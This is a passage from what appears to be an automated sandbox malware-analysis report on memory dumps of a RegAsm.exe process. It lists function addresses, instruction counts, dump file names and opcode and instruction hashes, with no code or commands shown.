                                                        • Opcode Fuzzy Hash: 28efa04de4cd37b3d29e9ede285b763ab786577d79d21ee86cbba71b8be6fe7d
                                                        • Instruction Fuzzy Hash: 3621F272E80750ABD3629F19C810B9A7BB6FB84B58F124869AB559B350D730EC01CF94
                                                        Function 02EC6BD7 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ee6e1d71b27aee55277fd3355ad61de45330be007cbabd54ecb55ce2a758d9f
                                                        • Instruction ID: d66c07bcc363b6be004ebf12d30116424411323791bed67e2c670a9a289f9742
                                                        • Opcode Fuzzy Hash: 7ee6e1d71b27aee55277fd3355ad61de45330be007cbabd54ecb55ce2a758d9f
                                                        • Instruction Fuzzy Hash: BD3181316402049FDB54CF69E9C5A8B7BE9FF88304F918469FA08DF285D370E955CBA4
                                                        Function 02EC60B8 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9e33c2f50a517ccbdcbebfbaf2469231a11cc86b7aa1fb7812c59eb11187aa8
                                                        • Instruction ID: b6c0203644cc2d43027a699e7e9d5f84e5c9c6f25f11b810e1667d1786496ed2
                                                        • Opcode Fuzzy Hash: e9e33c2f50a517ccbdcbebfbaf2469231a11cc86b7aa1fb7812c59eb11187aa8
                                                        • Instruction Fuzzy Hash: 0D31D671BC0615AFDB229F99CD50B6BB7AEAF84754F20906DF605DB341DA30DD028BA0
                                                        Function 02E007AF Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 115347c4cf3ee8d08d8cafeb309023247dc2f8267953d341b22bffda9216890f
                                                        • Instruction ID: 72cad52324c149d286a1a7e7f468859e6db9661cb54bc3337e7a53aaee221c28
                                                        • Opcode Fuzzy Hash: 115347c4cf3ee8d08d8cafeb309023247dc2f8267953d341b22bffda9216890f
                                                        • Instruction Fuzzy Hash: EB31D132A84651DBC712DE24C8C0BABB7A6BB84360F05D429FD59A7390DB30DC528BE5
                                                        Function 0042EC03 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d87b778e8c2bc6a82f68fa7aefecc93b6ee9969ca8d2be6ab53c983838b1175d
                                                        • Instruction ID: 576ab4f9dc284f25be1ce7d617698f7e555a630cd6c8b9a7c91e6dff3e9ea66c
                                                        • Opcode Fuzzy Hash: d87b778e8c2bc6a82f68fa7aefecc93b6ee9969ca8d2be6ab53c983838b1175d
                                                        • Instruction Fuzzy Hash: 1131D172B106265BD354CE7AD880256F3E6FB88310B54863AD918C3B40E774F962C7D4
                                                        Function 02DFD6AA Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                        • Instruction ID: de58230a3a39caac4137d2ebe6fb15766122b7cafee79388137df3858ee81581
                                                        • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                        • Instruction Fuzzy Hash: 3131C376600254EFDBA2DE54D880B6AB3AADB80754F2B8468EE069F310E770DD40CB54
                                                        Function 00403050 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fa74bb2abf1d569c783aefd9cfbec8bc96a7c71e74784d6b0dc3694b04c32b29
                                                        • Instruction ID: e443eca0088de24ef3d3de47f40ffa1a4d4f12d5288de5a758120759002edd87
                                                        • Opcode Fuzzy Hash: fa74bb2abf1d569c783aefd9cfbec8bc96a7c71e74784d6b0dc3694b04c32b29
                                                        • Instruction Fuzzy Hash: BD31B172A10E108FD364CE7DC945643B7E5AB88300B41462EE95AD3B91DB74E901CB84
                                                        Function 02E3A6C7 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction ID: ba9c44168b87b9276e153dc3bf63ff0e1cbd8d7797656247ed6c0cd74c700597
                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction Fuzzy Hash: 42313672B40B01AFD761CF69DD84B96B7F8AB08A58F04993DA59AC3750E730E940CB60
                                                        Function 02E057C0 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c46eb251dd353afefcec138aca04910fdc88e11b37ae677ef718c49d3a384d0b
                                                        • Instruction ID: a73fee3e218fd8d33cd645243f31577c4fa0817e34eefcd7fd2123e30c538701
                                                        • Opcode Fuzzy Hash: c46eb251dd353afefcec138aca04910fdc88e11b37ae677ef718c49d3a384d0b
                                                        • Instruction Fuzzy Hash: 8C319E35695A05FFDB519B24DA84AA9BBA6FF44344F84B065EC0187B90D730E872CF90
                                                        Function 02E092C5 Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                        • Instruction ID: 2c05bf541cb994d2d34f764c1427e2c9c46104e4809df596cb25a5fe499fa1cf
                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                        • Instruction Fuzzy Hash: BB31BCB16482098FC701DF18D880A9A7BEAEF89754F008569FD51973A1C730DC11CBA2
                                                        Function 02E2438F Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28934e9e2cfc46bd5308c1ab772812de6be4d6a8fb78b6cc081a11f7c4692fa8
                                                        • Instruction ID: d2d07f652d6189c599eedb955d0b7a04fff5e681f7d059b6a3bb431e8ce08891
                                                        • Opcode Fuzzy Hash: 28934e9e2cfc46bd5308c1ab772812de6be4d6a8fb78b6cc081a11f7c4692fa8
                                                        • Instruction Fuzzy Hash: 2531F432B806559FC714DFA9C980B6EB7FAAF80308F00D429E506D7290E730D949CB90
                                                        Function 02E57190 Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                        • Instruction ID: c5987b30b13f95394ec281663929c4ec33580d435d7a0d3ebc87df06a2795a6c
                                                        • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                        • Instruction Fuzzy Hash: E9316975604216CFC710CF18C580956FBF6FF89318B25C5A9E9589B315E730ED16CBA1
                                                        Function 02EBC3CD Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction ID: cad77394b4655547b4492b56fc7df8f58ffa538a6a5e93be95c43c13eb8b0dc8
                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction Fuzzy Hash: 13212736640651ABCB16ABA48800AFBB7B6EF40714F50F41BFA95C7690E734DA40C760
                                                        Function 02DFC156 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 584b342cc8e77975779215b2d4834e976480d0fbd59ac0e98df8b97ce5f5ccb7
                                                        • Instruction ID: e104851d2cb03bcd155bdf135ffd071a670a4926858b2eba2810852be1e313cf
                                                        • Opcode Fuzzy Hash: 584b342cc8e77975779215b2d4834e976480d0fbd59ac0e98df8b97ce5f5ccb7
                                                        • Instruction Fuzzy Hash: A2312B715812208BCB20AF24CC81BA977B5FF41318F94E1A9ED859F381EB74D986CF90
                                                        Function 02ED03E6 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 823f7a14072d2d7f113592009e05a6f73cdc8d1fd82cb576f865542f966231d6
                                                        • Instruction ID: 04e29eb3bffc213442da9267b8bf392ec0486b29af18a756c72ad55ca4ace036
                                                        • Opcode Fuzzy Hash: 823f7a14072d2d7f113592009e05a6f73cdc8d1fd82cb576f865542f966231d6
                                                        • Instruction Fuzzy Hash: D5318171A40119AFCB48DFA5D894E9FBBB9FF88314F454169EA05E3240CB30BE05CBA0
                                                        Function 02DFE388 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction ID: 8881d1f40fbb35cf8b62d6db0365d099af3af889acd7a00dc5ef8456d4bca900
                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction Fuzzy Hash: CD318831600604AFD721CB68C884F6AB7FAEF45358F1585A9EA52CB7A4E770EE01CB50
                                                        Function 02E7E609 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f48b877dcbab457fa99bbeb7e14981c0af734761f390390606f66227c8bf7ec
                                                        • Instruction ID: 91fce3f2148727c4564dbe84117fc216617bcfa406f592694bf5dda837505adc
                                                        • Opcode Fuzzy Hash: 8f48b877dcbab457fa99bbeb7e14981c0af734761f390390606f66227c8bf7ec
                                                        • Instruction Fuzzy Hash: 03318475640206DFCB14DF58C8849AE77F6FF84308B199499F8199B392E771FA50CB90
                                                        Function 02E03616 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 42abff7cdfe2a29cba023c3db7b613d9b4e9fe706afde8eacb6d191baa23b879
                                                        • Instruction ID: 3c78f4582c7b1fecfdfdcd8a2948112f22d77fb2f4d004e8a96b0ed927ca7562
                                                        • Opcode Fuzzy Hash: 42abff7cdfe2a29cba023c3db7b613d9b4e9fe706afde8eacb6d191baa23b879
                                                        • Instruction Fuzzy Hash: 492148312C53509FDB21DF45C9D4B26BBA6FF80B18F05E9A9EE410B690C770E885CB82
                                                        Function 02ED0591 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cd0f9a2b61ed66dd55418bbe4726ad76ab3527776b7069c260e498310538a36
                                                        • Instruction ID: 19d80b3d1305e5234cbf002dab7b1403dde0ad287f807afddc5bf866bb543ce9
                                                        • Opcode Fuzzy Hash: 5cd0f9a2b61ed66dd55418bbe4726ad76ab3527776b7069c260e498310538a36
                                                        • Instruction Fuzzy Hash: 0C21F1326802058FD728CE29D8806BAB7A2EFC4308F99D838ED14CB681D730F857C790
                                                        Function 02E2F32A Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                        • Instruction ID: 47d1ed968f39d6548de91511435c933670755ec5bd6647ad8371a7fc2ff27ce6
                                                        • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                        • Instruction Fuzzy Hash: 3F21BE722002109FC719CF15C540B66BBBAEF85365F15916DE10B8B690EBB4EC05CEA4
                                                        Function 02E806F1 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a0d95376829ac06214aff3d4b237073e2ac42ef42cf808ce2267c527dc50a7e
                                                        • Instruction ID: a0ecabc67d6023b8acac792d0ce9f9a8a758be9773d55e9b04bf3f6bf5d5723a
                                                        • Opcode Fuzzy Hash: 0a0d95376829ac06214aff3d4b237073e2ac42ef42cf808ce2267c527dc50a7e
                                                        • Instruction Fuzzy Hash: 8721AD72A40229ABCF10EF59C881ABEB7F4FF48744F914069F545AB250D739AD51CFA0
                                                        Function 02E8019F Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4529a345c491195cc007bc2b3853d55b59768206a764910827fd835af53a308d
                                                        • Instruction ID: 5b1a4c2cb2d293567921b9393eaf877b3c00e571a3bb36e8f8046953be6000db
                                                        • Opcode Fuzzy Hash: 4529a345c491195cc007bc2b3853d55b59768206a764910827fd835af53a308d
                                                        • Instruction Fuzzy Hash: 0221AE71A40644AFC715EBA8D840F6AB7B9FF88744F1480A9F948D7691E734ED40CBA4
                                                        Function 02E39660 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 937f52f52f67ec15e9c2fb032665a0b0e887d2c86dc67b3384f1124b3fe82ded
                                                        • Instruction ID: 9e3bf826fe6f869b7ac70470e0848025363871672768780d82582d25925c7e67
                                                        • Opcode Fuzzy Hash: 937f52f52f67ec15e9c2fb032665a0b0e887d2c86dc67b3384f1124b3fe82ded
                                                        • Instruction Fuzzy Hash: 312138305C1B80DBCF366B25CC18B6677A6EB80329F10F61DF962465E1DB71A841CF55
                                                        Function 0040E130 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f4d490570efa91e7072a547b643c1d4fcdf3555980dd969f2ed760a59b8fcb5
                                                        • Instruction ID: ad9cd04d2f025af452df63dc17b94cf4106c42636abfc7bd1a10371b117c2806
                                                        • Opcode Fuzzy Hash: 8f4d490570efa91e7072a547b643c1d4fcdf3555980dd969f2ed760a59b8fcb5
                                                        • Instruction Fuzzy Hash: 7821B7319042449BC724DF66C881B6BB7F6FF88300F05C96EE856AB781C675A915CB54
                                                        Function 0040E133 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43e626e2439643bae6d6122b0fa86fa3cd6706aaab7fdae2fe3482267b31ff06
                                                        • Instruction ID: 4500927f1c68cc70b6d1f0498ece7c1b04a870d144438372d1e2a46d357bec23
                                                        • Opcode Fuzzy Hash: 43e626e2439643bae6d6122b0fa86fa3cd6706aaab7fdae2fe3482267b31ff06
                                                        • Instruction Fuzzy Hash: B421B7319042449BC724DFA7C881B6FB7F6FF88300F05C96EE856AB381C675A915C794
                                                        Function 02E80283 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0abbec0e78f8e448bdb5ce2aef839eab470f66b8e0ba0d0875182c91b3a541e8
                                                        • Instruction ID: bbe01cf25574677db9e739feadbf8332d600100f982a8d370792cc3445a0e94d
                                                        • Opcode Fuzzy Hash: 0abbec0e78f8e448bdb5ce2aef839eab470f66b8e0ba0d0875182c91b3a541e8
                                                        • Instruction Fuzzy Hash: B521D3725843459BC721FF99C844BABB7DCAF91348F089466BCCCC7251D730C908CAA2
                                                        Function 02ED01AA Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d20b5def9e53c0907518a09018324be8bb1c974cb7cecc9208af67136935959d
                                                        • Instruction ID: d07bfb1fb89255a75399b8c730d90377ec2c68ec5d81935f6ee859edb7869cba
                                                        • Opcode Fuzzy Hash: d20b5def9e53c0907518a09018324be8bb1c974cb7cecc9208af67136935959d
                                                        • Instruction Fuzzy Hash: D521E4612042504FD705CB1A88F45B6BFE5EFD622DB0B81EAD888CB383C125A807C7A0
                                                        Function 02E3A30B Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99021575b3f715c23aa9fb965c66e7d22393005faa45bcd02cc9955eba7436e7
                                                        • Instruction ID: a9063c19fdf63a7594394d5059bcc17a259fda2f86bcecab8ba86aa17e5f5337
                                                        • Opcode Fuzzy Hash: 99021575b3f715c23aa9fb965c66e7d22393005faa45bcd02cc9955eba7436e7
                                                        • Instruction Fuzzy Hash: A2218E35680A419FC725DF29CD01B5677F5EF48708F24946CA559CB761E331E882CF94
                                                        Function 02DFB765 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59bd8fdccaf1e5c6bb2ba2e093f0e0835dd14298e1f5c1eefaf6428868f61e97
                                                        • Instruction ID: 2ca85277c77d667fb36f891bf02f100e48f9943c9c77470bd3081534109af59b
                                                        • Opcode Fuzzy Hash: 59bd8fdccaf1e5c6bb2ba2e093f0e0835dd14298e1f5c1eefaf6428868f61e97
                                                        • Instruction Fuzzy Hash: 24219832180A00DFC722EF29C900F59B7FAFF48718F16896DE216876A1DB34A850CF58
                                                        Function 02ECEE26 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a0814fd8741f9cf89febedcdb2204189334c90069b33ac352588f1861a1f78d
                                                        • Instruction ID: a8750cd4025a4b8d1486c9a0b3f0abd09c4617936e1dd8e1d317cf1351210836
                                                        • Opcode Fuzzy Hash: 8a0814fd8741f9cf89febedcdb2204189334c90069b33ac352588f1861a1f78d
                                                        • Instruction Fuzzy Hash: 7121E433A108119F9B18CF7DD8004AAF7E6EFCC31436A463AD612DB2A4D770B911C684
                                                        Function 02E30124 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction ID: 5d9176bb44ba91838f51f4174eedb5699803dd6af0da956308313b6c77192df1
                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction Fuzzy Hash: 2511EF73680614BFD722DB84CC88F9ABBB9EB80759F108029FA019F190D671ED44DB64
                                                        Function 02E08770 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1df9efddaef8dae3c287c8bcd610482bfe8d042e79436d790519fe30c383291e
                                                        • Instruction ID: cb48c99572f27958d1ba2e8cc15baa88b91f514d027b88a457207b54a212fec8
                                                        • Opcode Fuzzy Hash: 1df9efddaef8dae3c287c8bcd610482bfe8d042e79436d790519fe30c383291e
                                                        • Instruction Fuzzy Hash: 7611B2327406109BCB11CF49C4C0A56B7E9AF8A718B58D07DED09DF249D7B2E942CB90
                                                        Function 02E03720 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd30d529d9a296c3e7216cdc03d4ea8e17ae2122027a4dbf570cbb14628e4c87
                                                        • Instruction ID: 531b4223e1feb6bfe1a195a97c730bd15631d2657130fd27152c50879625dcb1
